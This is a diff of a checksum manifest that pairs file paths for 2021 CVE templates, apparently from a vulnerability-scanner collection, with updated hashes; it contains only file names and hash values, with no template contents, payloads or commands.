+http/cves/2021/CVE-2021-24931.yaml:8f3767f72d39fd39dc1d00553e50aef5b173ecbd +http/cves/2021/CVE-2021-24940.yaml:6a0b9a81074c5aaef7bde2945bef45f10eb345f0 +http/cves/2021/CVE-2021-24946.yaml:3a4d4cfc34d5a511b33c1a76a2fe059541fe197d +http/cves/2021/CVE-2021-24947.yaml:022f22ea14f2f0676e1c07272af5aba03efa3053 +http/cves/2021/CVE-2021-24956.yaml:339cbac1db19465e0d25a4f90d2d55f944142c7f +http/cves/2021/CVE-2021-24970.yaml:17d42cbb1429b0f8777df3f0a0b6ca48398ae677 +http/cves/2021/CVE-2021-24979.yaml:b3aadea0c39cb6c5c9adf852d80b14fadef18f87 +http/cves/2021/CVE-2021-24987.yaml:edc39b6907ef2605474e34acf826a5933cdc4e56 +http/cves/2021/CVE-2021-24991.yaml:5393edba0ad37bf8970fbc6d7b9cfbc75f0c8ff6 +http/cves/2021/CVE-2021-24997.yaml:4a52f43bb591844303a7c0c52a9cdfba14c8d409 +http/cves/2021/CVE-2021-25003.yaml:4f4915a8ee421277034e17a138735dc318cabb88 +http/cves/2021/CVE-2021-25008.yaml:0bcea48bde1d68ec28fe67e30aa9a822912dbf28 +http/cves/2021/CVE-2021-25016.yaml:7e6ea783ce308443aa84ccd061dba0c7bbba2924 +http/cves/2021/CVE-2021-25028.yaml:d38dc672567ec95b3f2b5a0b797fd28b8a2d7f20 +http/cves/2021/CVE-2021-25033.yaml:e98b580977a1ba5d136b8aae82c888df2a894bf0 +http/cves/2021/CVE-2021-25052.yaml:472fbaadf0893f43ee8d43e85d2f46e476cb14a3 +http/cves/2021/CVE-2021-25055.yaml:e175d4f0d823e26721658f02a5e7c631176759d5 +http/cves/2021/CVE-2021-25063.yaml:46d6ad0bae440df431e4b56aca9d5a121465fd38 +http/cves/2021/CVE-2021-25065.yaml:f1b6f736537f9a72bde2384f1443c4ab0084a019 +http/cves/2021/CVE-2021-25067.yaml:75ca54639de2967279e5d07f4c03a0c3a2e85b29 +http/cves/2021/CVE-2021-25074.yaml:86f902ef7c1de43d539acdfb2bf4202bc5c174a2 +http/cves/2021/CVE-2021-25075.yaml:8fe74a43dacf914de021566e32d1ff9d5c80dbbe +http/cves/2021/CVE-2021-25078.yaml:96110cdcff53f96034547350353ece5e532daa45 +http/cves/2021/CVE-2021-25079.yaml:4a02cdd982df5d456ee61eb20c5335b6abf5ca1e +http/cves/2021/CVE-2021-25085.yaml:7fa0788163417bfeb1e50ccddda7b65d086975d8 +http/cves/2021/CVE-2021-25099.yaml:2b30cfde9c767777a7a4c3ef5ae75ece7a80e511 +http/cves/2021/CVE-2021-25104.yaml:d1cc1f795861da1c6cc3cd01ba821872415926a3 +http/cves/2021/CVE-2021-25111.yaml:848d9347a70528a3fc32d615a77956d8b32d6af6 +http/cves/2021/CVE-2021-25112.yaml:86708e57fa5acc7317cccbcf530321fa99e523ce +http/cves/2021/CVE-2021-25114.yaml:72f4bb1561a3044b20f26b03c6cadcce25d8b820 +http/cves/2021/CVE-2021-25118.yaml:dd94e5add2c3609d89d5935cd275265abf830bbe +http/cves/2021/CVE-2021-25120.yaml:6fb8f734b891e2d87809b58ea7fe1807476385bc +http/cves/2021/CVE-2021-25281.yaml:c57d9151cb6b073b60dc8a74f61c519550febd68 +http/cves/2021/CVE-2021-25296.yaml:3cc0966b94e1cb03c8e2208d1754c64c70133023 +http/cves/2021/CVE-2021-25297.yaml:1fdf0e532f562b3871fba445ad18063eecd8e341 +http/cves/2021/CVE-2021-25298.yaml:ff078e6641ae4db0cd2f715fdc6aa45e109ce1dc +http/cves/2021/CVE-2021-25299.yaml:b4f77988458464c9c989150e8eadfb956688293f +http/cves/2021/CVE-2021-25646.yaml:613615510e1352579448b531549c6b24701a4df7 http/cves/2021/CVE-2021-25864.yaml:5bf12f48d4f1cf9b4ae1a8f12b2b233b8e7cc408 -http/cves/2021/CVE-2021-25899.yaml:f35ca3d782ffdaa1b57bbbe14d30ef440083f249 +http/cves/2021/CVE-2021-25899.yaml:02932a44e1aeb4e24ec75fba31ce4af0a0082aeb http/cves/2021/CVE-2021-26084.yaml:a1fec58cd8b28e1be049da601d47bdd04c18870d http/cves/2021/CVE-2021-26085.yaml:9a53f10427ecdca46370e1cde02a230873c2c1b1 -http/cves/2021/CVE-2021-26086.yaml:de0af1029ee379f65562f0817327f3eb3cd73240 -http/cves/2021/CVE-2021-26247.yaml:813e286094270fc2a9c6e83467f5c9a746195ef9 -http/cves/2021/CVE-2021-26295.yaml:0c0b000791f3adbce1ddfcceea0737fc202723ba -http/cves/2021/CVE-2021-26475.yaml:018bfaaf4198d68479c45f56df98e6ea94bc3bdf -http/cves/2021/CVE-2021-26598.yaml:ee96bd8d12cd2c96aa719fc67e520e17afd05802 -http/cves/2021/CVE-2021-26702.yaml:ff06f2f5dce002f476d84f864cc49f159a7a1fe6 -http/cves/2021/CVE-2021-26710.yaml:ece1a33c413beb055ac00efcf2d87b90ecf48ca9 -http/cves/2021/CVE-2021-26723.yaml:ab13aff95abf585490097219b0bf7379b910f89a -http/cves/2021/CVE-2021-26812.yaml:175755939a0e882999da63b03091e028c05cadf2 -http/cves/2021/CVE-2021-26855.yaml:1f0104ede388d9cc6b2bbd94ec52c42c04b37201 -http/cves/2021/CVE-2021-27124.yaml:89f06360c0a7b0bc15dbe536ed3358a26a086af7 -http/cves/2021/CVE-2021-27132.yaml:0587d3142e023e11fa40e48162ba4449cef6a301 -http/cves/2021/CVE-2021-27309.yaml:67bda40ba62781a46a8867a1379ff21651d4b5e9 -http/cves/2021/CVE-2021-27310.yaml:1035e4ffd616d5ddb65a793f9b788066df7b98ff -http/cves/2021/CVE-2021-27314.yaml:ba3c8d009690da909e1a242589d094d55934b497 -http/cves/2021/CVE-2021-27315.yaml:6d5b704c04e8a1e84da258431f7616a522689312 -http/cves/2021/CVE-2021-27316.yaml:098c657ea3ac989dad8bc54a0bd37fd52f0463f3 -http/cves/2021/CVE-2021-27319.yaml:235234769404de1d1c7357de8bdf88d9e5c469b0 -http/cves/2021/CVE-2021-27320.yaml:6a2b50d422b5ee0db67827ac4d580f15f859383f -http/cves/2021/CVE-2021-27330.yaml:5560176e5ddfcc3a4117cff38475c676a1def444 -http/cves/2021/CVE-2021-27358.yaml:3905ed82aa2eeea1923ded77ac0c9b64542be417 -http/cves/2021/CVE-2021-27519.yaml:bd9fb581263961ef5812e9b5098ce170181d848f -http/cves/2021/CVE-2021-27520.yaml:ad64505c54e6b4012acb1ae8496f30feac5c3781 +http/cves/2021/CVE-2021-26086.yaml:e5dc1caee39c780a5f10813b3b8cb235da31599c +http/cves/2021/CVE-2021-26247.yaml:44a4965c74f781a052badf59ba02b5320d3f501a +http/cves/2021/CVE-2021-26295.yaml:21b08d1a07535b22a03e10713fe4fa8b1e026863 +http/cves/2021/CVE-2021-26475.yaml:e4c2c7a374b903acf52c595082657d2632cf9086 +http/cves/2021/CVE-2021-26598.yaml:ce4b83d05ec62f1c6dd7684a50c6aa9456d136e1 +http/cves/2021/CVE-2021-26702.yaml:20f1c563198d83579a3be3b60fa8e34f2a5cc5a0 +http/cves/2021/CVE-2021-26710.yaml:23061404b806327fdaa85b6e6801bd8b606cef32 +http/cves/2021/CVE-2021-26723.yaml:5a751546dce0c11affbf5c2a38f3bc833d52ea27 +http/cves/2021/CVE-2021-26812.yaml:58201089adfb8937582aedbe7178d1d5c78b9431 +http/cves/2021/CVE-2021-26855.yaml:92ef5ee68ea93a10f9c89e0365d81d5d0be07a91 +http/cves/2021/CVE-2021-27124.yaml:6b2738cfebf2fc7c65b0e5548d08a42eb1271a42 +http/cves/2021/CVE-2021-27132.yaml:b295524393a9e923742c8e5a5878f9769cc53024 +http/cves/2021/CVE-2021-27309.yaml:98012b074a3599f4a64a88ddc8b796ade2bbd82a +http/cves/2021/CVE-2021-27310.yaml:15c88e997640b9e1e2f278e1d0abcfc2a8c647d9 +http/cves/2021/CVE-2021-27314.yaml:96b8f0af3d841981f92954dd995adcfe0e6828f0 +http/cves/2021/CVE-2021-27315.yaml:af72afd6c2d5ff44e35ea8ac167448b9fa2c10e4 +http/cves/2021/CVE-2021-27316.yaml:71b45283f62eab6e4a525f4f0e37c28b82804251 +http/cves/2021/CVE-2021-27319.yaml:9ae6eb6be6c6dff95368b7e2859c776489f4504b +http/cves/2021/CVE-2021-27320.yaml:249c9ee19289ea36a0e14f90f22ad759b0e016e9 +http/cves/2021/CVE-2021-27330.yaml:e9a322601c006a98ef8748c368bc58d2fb02a237 +http/cves/2021/CVE-2021-27358.yaml:b1fd133075f017bc80b2181ba5d74d8bfee9d483 +http/cves/2021/CVE-2021-27519.yaml:3cbed77cd5cd1720ff8b7d3f532dc0289100a311 +http/cves/2021/CVE-2021-27520.yaml:7f8e7aa9703c054c0f366ec01aa51e9c25af52fa http/cves/2021/CVE-2021-27561.yaml:2b5aa2c7bfb7b68aa194d34acb15d5f7f40a0d05 -http/cves/2021/CVE-2021-27651.yaml:39fb830f437721b9a6fe9d4e2e9bd9bd2d5ea6c4 -http/cves/2021/CVE-2021-27670.yaml:7a64c705bc3dfa8d98eb0bb57b2e1ed3096ca284 +http/cves/2021/CVE-2021-27651.yaml:0360c550d46ed7a7b4d6f8daa9ae209f98ccebd0 +http/cves/2021/CVE-2021-27670.yaml:13c7fc1058d4107bb77f167222d816b9d41efb9a http/cves/2021/CVE-2021-27748.yaml:eba210d13902f5a60cff6a0fcabef2449a30459c -http/cves/2021/CVE-2021-27850.yaml:d35dc892217456d36955971f6553448a51ba1ce5 +http/cves/2021/CVE-2021-27850.yaml:1807533a148c6bf99c70ab274e07e8ed27e6d175 http/cves/2021/CVE-2021-27905.yaml:0874f175407217b5076a723ee87ee946b68421aa -http/cves/2021/CVE-2021-27909.yaml:e33b38cf69894197aee28f02dc905f9d17dc55c7 -http/cves/2021/CVE-2021-27931.yaml:e61e9edf0e817fb47c9ba62f56e1ed66b5126f8b +http/cves/2021/CVE-2021-27909.yaml:404885bd83d5f50ad99d27b14dbd83702513bcaa +http/cves/2021/CVE-2021-27931.yaml:46fc043bc1290e2191caac8d194d387ae9287a93 http/cves/2021/CVE-2021-28073.yaml:3708c1b88bb493d026117d61d8a0aa9fb020c5a6 -http/cves/2021/CVE-2021-28149.yaml:9deca2d8bb11af5f27106d06516c182e418f4bfa -http/cves/2021/CVE-2021-28150.yaml:1313591697934f2c6321b777f71a5d2700f33cfa -http/cves/2021/CVE-2021-28151.yaml:a821d10a36035c596664e83b4f1f5eddd305bd3d -http/cves/2021/CVE-2021-28164.yaml:b6f1c827fd7323322a828a10c04b0f0569aae167 -http/cves/2021/CVE-2021-28169.yaml:f07bb5b1831a95f2af2461f2d671327e12a98ff6 -http/cves/2021/CVE-2021-28377.yaml:b6342da40d280261dc23368ee5efece08782c94c -http/cves/2021/CVE-2021-28419.yaml:b3c3e7db2d94894cdad5bce2f940f45788becd46 +http/cves/2021/CVE-2021-28149.yaml:9fdec04ee4008ad7267fa9819812e09714482983 +http/cves/2021/CVE-2021-28150.yaml:da3d4043e1672dad79fdfe30906c7b538357219b +http/cves/2021/CVE-2021-28151.yaml:e6eff553fd3e118483197aea62c1210a4a4b090a +http/cves/2021/CVE-2021-28164.yaml:b69ee8ddc4fc7b1c342b7b46da34a1ea16fe944b +http/cves/2021/CVE-2021-28169.yaml:bbffb69d0dfb57b5bfa17b47fd8d86f1b56e4f43 +http/cves/2021/CVE-2021-28377.yaml:f25348995fc38cec6b3e2fef90e2dd29df203cc0 +http/cves/2021/CVE-2021-28419.yaml:daff190a2bf6d7471aa2311cad4a507737a8981e http/cves/2021/CVE-2021-28854.yaml:f642fff6999a311047096aeda3bd595410be28be -http/cves/2021/CVE-2021-28918.yaml:9788b8602dddc771aa713f6a17564f3d3ddd2fad -http/cves/2021/CVE-2021-28937.yaml:c5d1a7aaf2b2f80978fda20ad9605b1d05166299 -http/cves/2021/CVE-2021-29006.yaml:1336650d985e852c6b673d38667b53ab7a4d1c4d -http/cves/2021/CVE-2021-29156.yaml:a530dd3001cb5ac7d1b7ede57ca8ef866980fc5c -http/cves/2021/CVE-2021-29203.yaml:5fa05be2231b4858d2e952e091c22545e1da1fed -http/cves/2021/CVE-2021-29441.yaml:8bd8950068cd662fe6d944146febb7e0d3546107 +http/cves/2021/CVE-2021-28918.yaml:3fb57b777c1b0bad1c1e314a93c6519a59301ae7 +http/cves/2021/CVE-2021-28937.yaml:5ad993544bc0b2692e8180ebb584f09512ddc569 +http/cves/2021/CVE-2021-29006.yaml:2c1c3a462ca56d508e80b22ad49ed5094732959b +http/cves/2021/CVE-2021-29156.yaml:038d5679f1b1391a5b8411b1dc109d2f7b87b246 +http/cves/2021/CVE-2021-29203.yaml:f3a37456bb3a447e1d9e46338feef9d01def3a02 +http/cves/2021/CVE-2021-29441.yaml:e96b2ab7a297a6667386b110dfaf3e32811e858e http/cves/2021/CVE-2021-29442.yaml:5c69dd6497eeed3e367c3146a23e77abd3171c61 -http/cves/2021/CVE-2021-29484.yaml:48fad031b4d79a9f1ece6c4270d94e02529d71ca -http/cves/2021/CVE-2021-29490.yaml:81f9311267638d300bde9ba99b4de0e97e4ca7b8 -http/cves/2021/CVE-2021-29505.yaml:c7c8efe86807cd86dea35c839a70f3e12cc50bd4 -http/cves/2021/CVE-2021-29622.yaml:4a4451cafbd4777a81d4e55d9f9bf426c95623bf -http/cves/2021/CVE-2021-29625.yaml:4594d9801e4c29bd82d7c60fb76b6b21b9caa7e8 -http/cves/2021/CVE-2021-3002.yaml:bf98099b7dbaf805bab615fa7ee45b501358cf38 -http/cves/2021/CVE-2021-30049.yaml:2696afebc14bd14e929a6beff82d240c0486c417 -http/cves/2021/CVE-2021-30128.yaml:56e72c106d771bc1d1f97e141bb5f7957dcc7719 -http/cves/2021/CVE-2021-30134.yaml:8421da3f6525e4be9ba081f127d1851d69c0c0dd -http/cves/2021/CVE-2021-30151.yaml:0363e47e0451a4001b4622190da9d4b0a28f4a0e -http/cves/2021/CVE-2021-3017.yaml:97a74c2922c8f22381c63a826c85b94131699bae -http/cves/2021/CVE-2021-30175.yaml:bca1eccc6998e526530b41ecb4c8e89ac0087dbc -http/cves/2021/CVE-2021-3019.yaml:2c3c47e064253d2abe9f6a6e1cd286f2d3ad670b -http/cves/2021/CVE-2021-30213.yaml:027b7f1a063eb3479af15dab135e73ded15d610f +http/cves/2021/CVE-2021-29484.yaml:93ab60708ae49ce3cf4ee6dcadbe2815c36d2431 +http/cves/2021/CVE-2021-29490.yaml:20bfe9454dc2af56713b6ea4a882bdf043273f99 +http/cves/2021/CVE-2021-29505.yaml:c1a6e79a34049480df463f8ff05e73175a394d36 +http/cves/2021/CVE-2021-29622.yaml:56dba19962f4a8c3453f3bd74391aa4bfe4e2651 +http/cves/2021/CVE-2021-29625.yaml:b62f5c7db980dcdf0e530d3461066edd253f7c76 +http/cves/2021/CVE-2021-3002.yaml:5278b670c78aa256f0a65913d3d28c00c7c98999 +http/cves/2021/CVE-2021-30049.yaml:29952f705af83a8b844d611856de1975d329472c +http/cves/2021/CVE-2021-30128.yaml:8ef76db6ef907e7e726558b270b45a17df298526 +http/cves/2021/CVE-2021-30134.yaml:fbbbf1df617cc340dc652aa75935c1256ce0e35e +http/cves/2021/CVE-2021-30151.yaml:ff375d645b6cb379732f805eae624019aeca8f6a +http/cves/2021/CVE-2021-3017.yaml:f4be04c9e46e7fb65d725bf695cb6de9a289adf5 +http/cves/2021/CVE-2021-30175.yaml:f7c08273f70758ea2a0e6c37bb66b92956aed716 +http/cves/2021/CVE-2021-3019.yaml:cc830bee32ffa89ebd29fbeaa71d9c4be817f956 +http/cves/2021/CVE-2021-30213.yaml:db16524056b14992c74b55acc520f59638c43bd3 http/cves/2021/CVE-2021-30461.yaml:1a9046aa944c6a835c486e410a87cb55e22d0e8e http/cves/2021/CVE-2021-30497.yaml:ab4ea36a5fb1303ff42527300d0155c6e5c35129 -http/cves/2021/CVE-2021-3110.yaml:b401c34484ef57293cbd8f74a53791fb7dd64583 +http/cves/2021/CVE-2021-3110.yaml:74bb809763bb3d70e72c04983e8f12fd5466b28b http/cves/2021/CVE-2021-31195.yaml:11a21e693b9339f435b12f89b6e7096807d355de -http/cves/2021/CVE-2021-31249.yaml:9db53f311362b04faff10fe287069a1b041d2a51 +http/cves/2021/CVE-2021-31249.yaml:cfc60dcdb822c2be30cc7fcfde345631de503a24 http/cves/2021/CVE-2021-31250.yaml:2f73c9897c5196c9878bcb7697ab97aaae7409ec http/cves/2021/CVE-2021-3129.yaml:9200ddc36020bce3e1f96dc2fbc7dca00e20d430 -http/cves/2021/CVE-2021-31537.yaml:aacee908c8454bd61f43665a0d9221b98499b7d0 -http/cves/2021/CVE-2021-31581.yaml:a3e1b3d8ebd6e71282a3644bcc42637cb5fd90fd -http/cves/2021/CVE-2021-31589.yaml:e8a895de03150764247fbf390604be8e54e27282 -http/cves/2021/CVE-2021-31602.yaml:7f2a9eaf96a7e0a21e7ed82f0ff539557f06d207 -http/cves/2021/CVE-2021-31682.yaml:c757494aa021be43843c36fadec7540ca3c11622 +http/cves/2021/CVE-2021-31537.yaml:b7e7880000640d88dd252c206da5cf51076a5f7f +http/cves/2021/CVE-2021-31581.yaml:e0344e657276ff6ae5abbfcf5e2d7a957c151401 +http/cves/2021/CVE-2021-31589.yaml:6cc9dbf89449e7748ed1003a7dc3b52c15954a72 +http/cves/2021/CVE-2021-31602.yaml:5fd8f95c969dbf0cd185f9fe7eb26630e8e30a18 +http/cves/2021/CVE-2021-31682.yaml:3b0da5a9885602295336bc7fd07ce388f381008e http/cves/2021/CVE-2021-31755.yaml:58397c2f09e539a90e7cd7e80ff63ca2385fe07c -http/cves/2021/CVE-2021-31805.yaml:8102e5a32be9fc66d7013998c7934f860759a547 -http/cves/2021/CVE-2021-31856.yaml:84d6667e4fca4ee8ff2d9a2fb1431921012e90b6 -http/cves/2021/CVE-2021-31862.yaml:7b0d2a9e865f7f0ab082630fc246b9f8d4660039 -http/cves/2021/CVE-2021-32030.yaml:42888df38b7112dbf86dde7847a84bc7bfa733df -http/cves/2021/CVE-2021-32172.yaml:919c7408dd32a53655d7ea8c5ded01ac804d4600 -http/cves/2021/CVE-2021-3223.yaml:af55a214539ec1fd37708f612382d3dd96f936bc -http/cves/2021/CVE-2021-32305.yaml:1d491d8c6ed152f69543c974a359c25d0aa80642 -http/cves/2021/CVE-2021-32618.yaml:2cd3b86d93b3cd60020fdaf8db48b1859544d6de +http/cves/2021/CVE-2021-31805.yaml:abf19f1945e926a87c03716e921382790740798f +http/cves/2021/CVE-2021-31856.yaml:ef4521a8db31910619ec11bd7424f3a72c1c48a6 +http/cves/2021/CVE-2021-31862.yaml:d56d076c17e5b5d8be68f4e3a3760cc39f6b3d15 +http/cves/2021/CVE-2021-32030.yaml:19446164e062aaf2c13f27725777b63225c76c0d +http/cves/2021/CVE-2021-32172.yaml:1105e09f330de4c808e43dbb703565bb925feb52 +http/cves/2021/CVE-2021-3223.yaml:49bfdf918579c3a3248b1c1f7a9550201fc26161 +http/cves/2021/CVE-2021-32305.yaml:0a6f4d0127c3a7b81aecafb344af11f38eb3a15b +http/cves/2021/CVE-2021-32618.yaml:04ad76101af2978946048ec4e1e7fb219bac996b http/cves/2021/CVE-2021-32682.yaml:a28249c56b1874a5f590bbfb58318cf0560bd40a -http/cves/2021/CVE-2021-32789.yaml:2baadcc84dba393438fec6b307c5b32f470b3b24 -http/cves/2021/CVE-2021-32819.yaml:f5e1c564a830c99644a6795dced48dd1915c17bf -http/cves/2021/CVE-2021-32820.yaml:5fcd7fa1198bb7e0f8ab3248fada923fabea2675 -http/cves/2021/CVE-2021-32853.yaml:32c15a66e638973f20a6ff3f10a2cb9b277c699b -http/cves/2021/CVE-2021-3293.yaml:3a654289cdeb1cb7f9bc91b6669e70887010a71d -http/cves/2021/CVE-2021-3297.yaml:41e214cf0c3c289fc1c63239bd8c5ea876bb20fd -http/cves/2021/CVE-2021-33044.yaml:db41f2a1b87d593206231442b09fa360d7a44413 -http/cves/2021/CVE-2021-33221.yaml:976738788f7fd2cb48cf082fb0f3345ac46a6390 +http/cves/2021/CVE-2021-32789.yaml:a28dac7da5d15f2011122991fe01ea760f599dc8 +http/cves/2021/CVE-2021-32819.yaml:1b1e559128729bcea177ca3d7eb0eec1dd645279 +http/cves/2021/CVE-2021-32820.yaml:efe7644ab2de7068fe3cdbd2d92e65e46b1626b9 +http/cves/2021/CVE-2021-32853.yaml:a2bd17593cc678b9effb7dbae22a0de5ae963bac +http/cves/2021/CVE-2021-3293.yaml:3f291a55698a51cfa42f7885b9df35f08521bff8 +http/cves/2021/CVE-2021-3297.yaml:4196e9a08459efb80c70bf7650e8bbf22c439402 +http/cves/2021/CVE-2021-33044.yaml:ff361feaff54b02aba51fdecb8fb37c0ea85f178 +http/cves/2021/CVE-2021-33221.yaml:1a218a0f045c38837bc2e291da9204d10ffedec8 http/cves/2021/CVE-2021-33357.yaml:ef068eb074c52746558a4f7ff4485f9b948c5b4f http/cves/2021/CVE-2021-33544.yaml:69108bbbaf50d5dac5de8df9603eca2b55886cf7 -http/cves/2021/CVE-2021-33564.yaml:63c1c77e7c5ff6cf69a5fa8e42072d74909e5728 -http/cves/2021/CVE-2021-3374.yaml:4825a3447c48a188cfbfdd45276dc24ee989b1ca -http/cves/2021/CVE-2021-3377.yaml:e1eb308921f66bb3974cb6039c1837a32aa023cd -http/cves/2021/CVE-2021-3378.yaml:25a1a6fcc71ba0b59296dcbd8bdfff87b6de4653 -http/cves/2021/CVE-2021-33807.yaml:6bb19b6bc328ccfe691d2124238a7012c7bb4396 -http/cves/2021/CVE-2021-33851.yaml:da97fd57aeae2a16e3052d8918dc9a5a3f93fd4d -http/cves/2021/CVE-2021-33904.yaml:3dee3a78ba300a41f07dba901ccb664270d816d6 -http/cves/2021/CVE-2021-34370.yaml:3d4d323647f7653399ecb0c65ed16412e4838a89 +http/cves/2021/CVE-2021-33564.yaml:f2d6354c2dbcdf94ec52265d92ceeab368d40478 +http/cves/2021/CVE-2021-3374.yaml:82fd88a7293f16bbbd6f2f9cb29a6a912657d408 +http/cves/2021/CVE-2021-3377.yaml:813c7aac279a8008bd6c8ff2704d8d71d8da2e23 +http/cves/2021/CVE-2021-3378.yaml:d915bb16dc8bf4b96e7106d29e7ff548f851e490 +http/cves/2021/CVE-2021-33807.yaml:d4addeea28778fd7da85f21e2bbea9b6b3c6e279 +http/cves/2021/CVE-2021-33851.yaml:9132a56bb8e605daf64a4a769964b1c15440d67e +http/cves/2021/CVE-2021-33904.yaml:f5d52a5bee95e9a4edfa7827d65ab8572f53a177 +http/cves/2021/CVE-2021-34370.yaml:a97c98ffb2b0480fc477fb5c60ce214e06dddb89 http/cves/2021/CVE-2021-34429.yaml:2e3f2c988e1913fac83141dd9fc8613138eb7d4a -http/cves/2021/CVE-2021-34473.yaml:8225323733cdf9c1ae5e987af6de77ea6b7b7b73 -http/cves/2021/CVE-2021-34621.yaml:51a39c950d4a675b4df06df365f383ce7cbf240d -http/cves/2021/CVE-2021-34640.yaml:c73701148ad73ee6d97cf1207c3a8c227e71a236 -http/cves/2021/CVE-2021-34643.yaml:4fceea8ffc57b9e9a3002633e39a749dcd4efc69 -http/cves/2021/CVE-2021-34805.yaml:0e75cd0780914e189b1fa2ea1a937d090168c61a -http/cves/2021/CVE-2021-35250.yaml:52879bd1812f52fc9518cf69a6e41ceac51e78b4 -http/cves/2021/CVE-2021-35265.yaml:7cea808fb886c592d2d579ef38b8b65b1c4099e8 -http/cves/2021/CVE-2021-35323.yaml:4b3f15546a9e54a91475eeee00759a5c02148af6 -http/cves/2021/CVE-2021-35336.yaml:848ef85eae539b09fef6ddaeacd34685a9aae78c -http/cves/2021/CVE-2021-35380.yaml:2162a8188c0a372a3e3fa55c8369ca12c08bbdf3 -http/cves/2021/CVE-2021-35464.yaml:ebdffa4fbe7377654a165f186a99ba3b15c7709c -http/cves/2021/CVE-2021-35488.yaml:d7839133924ac7f4efe5a813c1db2d5a50d11e07 -http/cves/2021/CVE-2021-35587.yaml:b82060fc194976b20355bebd96ba9408a5e3eeb0 -http/cves/2021/CVE-2021-3577.yaml:98824fff578455be9f735774aafa9084d26d614d -http/cves/2021/CVE-2021-36260.yaml:a5e7ee00760318fd6c9c7328b9053ccfb68a1bf7 -http/cves/2021/CVE-2021-36356.yaml:e2f09b9ffe9ddb68957ad09d43a3a1e45a1eaf9a -http/cves/2021/CVE-2021-36380.yaml:a3fb89fba8181c4dbc66e1b0555c6b8e8af75ea0 -http/cves/2021/CVE-2021-36450.yaml:4b3e2bce3606706c75de94142a268b17520acfbd -http/cves/2021/CVE-2021-3654.yaml:73f7538bfe6eee4436f10bd008167a4b6b500be5 -http/cves/2021/CVE-2021-36580.yaml:2e4f367aa886d3457576578572e8d97d14a85368 -http/cves/2021/CVE-2021-36748.yaml:9155e4226f83b2e2957e933b3f1f2ac47f1cd0ac -http/cves/2021/CVE-2021-36749.yaml:c68055fe29273a613ce96609bea44e2cdd752187 -http/cves/2021/CVE-2021-36873.yaml:9d58a4bcedc7b23a1b79fdee274c53b089ed679e -http/cves/2021/CVE-2021-37216.yaml:eca49a54930f7a07f6f83c16ce91824d37b07f86 -http/cves/2021/CVE-2021-37304.yaml:d8170f4854851cb92a850fa39fee68d7279cd18c -http/cves/2021/CVE-2021-37305.yaml:9e9eb674697731744e813b22b819120f2f20bd80 -http/cves/2021/CVE-2021-37416.yaml:ce3060d68274a9bde72b08992b0942b34054f0b8 -http/cves/2021/CVE-2021-37538.yaml:6c91665ea0398d07b1313036ab9f7310208df8e9 -http/cves/2021/CVE-2021-37573.yaml:224d1adfcb7b322b38b3350c69e7384a54d0c4a2 -http/cves/2021/CVE-2021-37580.yaml:1cf5bff02a8568a929f21b38be67d9c5c79612c2 -http/cves/2021/CVE-2021-37589.yaml:acc861fc87dd3e0e83d11c3525cb16c2b3a27d4a -http/cves/2021/CVE-2021-37704.yaml:7a58f71de040ec6c0494958f19636b1676289807 -http/cves/2021/CVE-2021-37833.yaml:94a4487e9893321afb931238dd1f442d733262c9 -http/cves/2021/CVE-2021-38314.yaml:b41d6fbf2645e849c46e4c8ffb0f68c3b01cafb7 -http/cves/2021/CVE-2021-38540.yaml:d9565ea50b8ae10afa972c9723028ade0da3e303 +http/cves/2021/CVE-2021-34473.yaml:0fa84f3304072ad8676e18c20c06f15d83a21890 +http/cves/2021/CVE-2021-34621.yaml:89f8e4f4bd2066ab41c8ef730f41eece3697cbad +http/cves/2021/CVE-2021-34640.yaml:b60c36ab7e85c9b668d08ca97484fca8823377e8 +http/cves/2021/CVE-2021-34643.yaml:80b70493967a324e77da9ca818e8180bf80a5ab4 +http/cves/2021/CVE-2021-34805.yaml:a946682618e112b9db985d29913f1154f13d1f08 +http/cves/2021/CVE-2021-35250.yaml:2c90c062f54a70551b33791db880cde287523a3b +http/cves/2021/CVE-2021-35265.yaml:41f145aa8d735424c608148bd4fabd546d1f643e +http/cves/2021/CVE-2021-35323.yaml:0fa9fea66d4f63ab9995e896b5f04593bbd02d7f +http/cves/2021/CVE-2021-35336.yaml:5a0dd532933f1e8db157ab9ec9192a518e2afb6c +http/cves/2021/CVE-2021-35380.yaml:3f7882e80ca8cfa68e4236aa2f86e8358cbfa2e0 +http/cves/2021/CVE-2021-35464.yaml:477079912a8c25a2bd483fdf1458a9a047026d45 +http/cves/2021/CVE-2021-35488.yaml:d66076315391e6a9db0e6ac3e212f09725b9b59d +http/cves/2021/CVE-2021-35587.yaml:f1f7e487bcffba86db35f1acdeefbb78c388fe8f +http/cves/2021/CVE-2021-3577.yaml:6bf558ed9540515eabfc308ee5c58c5432629f9a +http/cves/2021/CVE-2021-36260.yaml:ddc0e8fb1204e0e8497a9b0d73627ac2de0e2f03 +http/cves/2021/CVE-2021-36356.yaml:73cc015db93111449f9d35fb5b490b7c9becc956 +http/cves/2021/CVE-2021-36380.yaml:22ae3c4e7cd092636998a73652121095b0306d96 +http/cves/2021/CVE-2021-36450.yaml:6611cb1b41c31d9d66f7cac8a9baa3918273871e +http/cves/2021/CVE-2021-3654.yaml:6f6997229d2ec67af783bd467f4e49d891bcb303 +http/cves/2021/CVE-2021-36580.yaml:dcbcc5aaa16b92505ef9dbf53473f4b64ae4d711 +http/cves/2021/CVE-2021-36748.yaml:488c699739dc1691954a3540208fc821467b173f +http/cves/2021/CVE-2021-36749.yaml:aab4d537adaff2fb9a9bdee18e033693c55946ec +http/cves/2021/CVE-2021-36873.yaml:c09f32949b605fdf2bb4a2b993043711bb858f56 +http/cves/2021/CVE-2021-37216.yaml:441241388489b985803463b99251e9dcfb5ec11a +http/cves/2021/CVE-2021-37304.yaml:74932a256f4ae1ba2536b83207f5276eb0f6d036 +http/cves/2021/CVE-2021-37305.yaml:7b1022f8e8f8a4d44578c2572c779b1c8ef31c72 +http/cves/2021/CVE-2021-37416.yaml:ce1fd505090ff8cb1b83f0fefbeab1a735fb2b4e +http/cves/2021/CVE-2021-37538.yaml:a359aca80b32a53f4babe0de7ac529709804537b +http/cves/2021/CVE-2021-37573.yaml:b3baa92bbf0040ff70cb3c971e78fee1b76081ef +http/cves/2021/CVE-2021-37580.yaml:09a2b9031a3f7494bc1c6b284d68b6c304e31bcf +http/cves/2021/CVE-2021-37589.yaml:49596951b7841ee1b55b3c77cfb6b9147a0ddcba +http/cves/2021/CVE-2021-37704.yaml:1c3734573cccba8cdbcf61b0cb6cddf7d2f6a142 +http/cves/2021/CVE-2021-37833.yaml:26051fc04e2321dc9d055c79f0e6e9b9fdb86834 +http/cves/2021/CVE-2021-38314.yaml:c7a825ad4bc208c242722cb07f6c0d9a572e412c 